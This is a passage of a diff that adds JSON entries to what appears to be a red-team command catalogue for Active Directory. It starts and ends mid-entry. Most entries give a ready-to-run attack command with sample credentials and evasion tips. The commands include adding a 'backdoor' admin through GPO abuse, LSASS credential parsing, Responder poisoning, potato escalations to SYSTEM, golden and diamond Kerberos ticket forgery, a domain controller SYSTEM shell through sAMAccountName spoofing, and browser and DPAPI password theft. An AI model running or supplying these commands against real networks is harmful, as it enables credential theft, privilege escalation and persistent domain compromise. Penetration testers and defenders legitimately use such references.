"https://attack.mitre.org/techniques/T1003/001/" + ], + "added": true + }, + { + "id": "wadcoms:pyGPOAbuse-ScheduledTask", + "toolId": "wadcoms:pyGPOAbuse", + "toolName": "pyGPOAbuse", + "name": "pyGPOAbuse-ScheduledTask", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Lateral Movement", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Lateral Movement", + "Exploitation" + ], + "command": "# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n -dc-ip 10.10.10.1 \\\n -taskname \"SecurityUpdate\" \\\n -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1", + "description": "pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1", + "mitre": [ + "T1484.001" + ], + "requires": [ + "Username", + "Password", + "Hash" + ], + "services": [ + "LDAP", + "SMB" + ], + "references": [ + "https://github.com/Hackndo/pyGPOAbuse", + "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e", + "https://attack.mitre.org/techniques/T1484/001/" + ], + "added": true + }, + { + "id": "wadcoms:Pypykatz-Minidump", + "toolId": "wadcoms:Pypykatz", + "toolName": "Pypykatz", + "name": "Pypykatz-Minidump", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "pypykatz lsa minidump lsass.dmp -o output.txt", + "description": "Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt", + "mitre": [ + "T1003.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM", + "Kerberos" + ], + "references": [ + "https://github.com/skelsec/pypykatz", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "added": true + }, + { + "id": "wadcoms:Responder-Poisoning", + "toolId": "wadcoms:Responder", + "toolName": "Responder", + "name": "Responder-Poisoning", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Collection", + "Execution" + ], + "nativeCategory": [ + "Credential Access", + "Collection", + "Exploitation" + ], + "command": "# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv", + "description": "Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt", + "mitre": [ + "T1557.001" + ], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "SMB" + ], + "references": [ + "https://github.com/lgandx/Responder", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing", + "https://attack.mitre.org/techniques/T1557/001/" + ], + "added": true + }, + { + "id": "wadcoms:RoguePotato-SeImpersonate", + "toolId": "wadcoms:RoguePotato", + "toolName": "RoguePotato", + "name": "RoguePotato-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "Linux", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999", + "description": "RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "DCOM", + "RPC" + ], + "references": [ + "https://github.com/antonioCoco/RoguePotato", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Describe", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Describe", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi", + "description": "Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi", + "mitre": [], + "requires": [ + "TGT" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-DiamondTicket", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-DiamondTicket", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Defense Evasion", + "Execution" + ], + "nativeCategory": [ + "Persistence", + "Defense Evasion", + "Exploitation" + ], + "command": "# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap", + "description": "Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "AES_Key", + "Username", + "Password" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket", + "https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Dump", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Dump", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap", + "description": "Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt", + "mitre": [ + "T1558" + ], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket", + "https://attack.mitre.org/techniques/T1558/" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-GoldenTicket-AES", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-GoldenTicket-AES", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Execution" + ], + "nativeCategory": [ + "Persistence", + "Exploitation" + ], + "command": "# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap", + "description": "Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775", + "mitre": [ + "T1558.001" + ], + "requires": [ + "AES_Key" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket", + "https://attack.mitre.org/techniques/T1558/001/" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Harvest", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Harvest", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Collection", + "Persistence" + ], + "nativeCategory": [ + "Credential Access", + "Collection", + "Persistence" + ], + "command": "# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap", + "description": "Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds", + "mitre": [ + "T1558" + ], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt", + "https://attack.mitre.org/techniques/T1558/" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Monitor", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Monitor", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john /nowrap", + "description": "Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john", + "mitre": [ + "T1558" + ], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt", + "https://attack.mitre.org/techniques/T1558/" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-OverPassTheHash", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-OverPassTheHash", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Lateral Movement", + "Credential Access" + ], + "nativeCategory": [ + "Lateral Movement", + "Credential Access" + ], + "command": "# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap", + "description": "Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local", + "mitre": [], + "requires": [ + "AES_Key", + "Username" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Ptt", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Ptt", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Lateral Movement", + "Defense Evasion" + ], + "nativeCategory": [ + "Lateral Movement", + "Defense Evasion" + ], + "command": "# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7", + "description": "Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi", + "mitre": [], + "requires": [ + "TGT" + ], + "services": [ + "Kerberos", + "SMB", + "LDAP" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-Renew", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-Renew", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Credential Access" + ], + "nativeCategory": [ + "Persistence", + "Credential Access" + ], + "command": "# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap", + "description": "Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local", + "mitre": [], + "requires": [ + "TGT" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket" + ], + "added": true + }, + { + "id": "wadcoms:Rubeus-TgtDeleg", + "toolId": "wadcoms:Rubeus", + "toolName": "Rubeus", + "name": "Rubeus-TgtDeleg", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap", + "description": "Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/GhostPack/Rubeus", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:sam-the-admin", + "toolId": "wadcoms:sam", + "toolName": "sam", + "name": "sam_the_admin (sAMAccountName Spoofing)", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution", + "Credential Access" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation", + "Credential Access" + ], + "command": "# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump", + "description": "WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos", + "SMB", + "LDAP" + ], + "references": [ + "https://github.com/WazeHell/sam-the-admin", + "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing" + ], + "added": true + }, + { + "id": "wadcoms:ShadowCoerce", + "toolId": "wadcoms:ShadowCoerce", + "toolName": "ShadowCoerce", + "name": "ShadowCoerce", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1", + "description": "ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/ShutdownRepo/ShadowCoerce", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp" + ], + "added": true + }, + { + "id": "wadcoms:SharpChrome-Logins", + "toolId": "wadcoms:SharpChrome", + "toolName": "SharpChrome", + "name": "SharpChrome-Logins", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "SharpChrome.exe logins /unprotect", + "description": "SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)", + "mitre": [ + "T1555.003" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/GhostPack/SharpDPAPI", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1555/003/" + ], + "added": true + }, + { + "id": "wadcoms:SharpDPAPI-Masterkeys-Credentials", + "toolId": "wadcoms:SharpDPAPI", + "toolName": "SharpDPAPI", + "name": "SharpDPAPI-Masterkeys-Credentials", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt", + "description": "SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt", + "mitre": [ + "T1555.004" + ], + "requires": [ + "Shell", + "Password" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/GhostPack/SharpDPAPI", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://attack.mitre.org/techniques/T1555/004/" + ], + "added": true + }, + { + "id": "wadcoms:SharpGPOAbuse-AddLocalAdmin", + "toolId": "wadcoms:SharpGPOAbuse", + "toolName": "SharpGPOAbuse", + "name": "SharpGPOAbuse-AddLocalAdmin", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Lateral Movement", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Lateral Movement", + "Persistence" + ], + "command": "SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"", + "description": "SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO", + "mitre": [ + "T1484.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/FSecureLABS/SharpGPOAbuse", + "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e", + "https://attack.mitre.org/techniques/T1484/001/" + ], + "added": true + }, + { + "id": "wadcoms:SharpGPOAbuse-AddUserRights", + "toolId": "wadcoms:SharpGPOAbuse", + "toolName": "SharpGPOAbuse", + "name": "SharpGPOAbuse-AddUserRights", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence" + ], + "command": "SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"", + "description": "SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO", + "mitre": [ + "T1484.001" + ], + "requires": [ + "Shell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/FSecureLABS/SharpGPOAbuse", + "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e", + "https://attack.mitre.org/techniques/T1484/001/" + ], + "added": true + }, + { + "id": "wadcoms:SharpView-Enumeration", + "toolId": "wadcoms:SharpView", + "toolName": "SharpView", + "name": "SharpView-Enumeration", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs", + "description": "SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/tevora-threat/SharpView", + "https://github.com/PowerShellMafia/PowerSploit", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology" + ], + "added": true + }, + { + "id": "wadcoms:SpoolSample-PrinterBug", + "toolId": "wadcoms:SpoolSample", + "toolName": "SpoolSample", + "name": "SpoolSample-PrinterBug", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Exploitation" + ], + "command": "SpoolSample.exe 10.10.10.1 10.10.10.2", + "description": "SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "RPC", + "NTLM" + ], + "references": [ + "https://github.com/leechristensen/SpoolSample", + "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn" + ], + "added": true + }, + { + "id": "wadcoms:SweetPotato-SeImpersonate", + "toolId": "wadcoms:SweetPotato", + "toolName": "SweetPotato", + "name": "SweetPotato-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc", + "description": "SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "DCOM", + "RPC" + ], + "references": [ + "https://github.com/CCob/SweetPotato", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" + ], + "added": true + }, + { + "id": "wadcoms:Whisker-ShadowCredentials", + "toolId": "wadcoms:Whisker", + "toolName": "Whisker", + "name": "Whisker-ShadowCredentials", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Persistence", + "Credential Access" + ], + "nativeCategory": [ + "PrivEsc", + "Persistence", + "Credential Access" + ], + "command": "# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local", + "description": "Whisker is 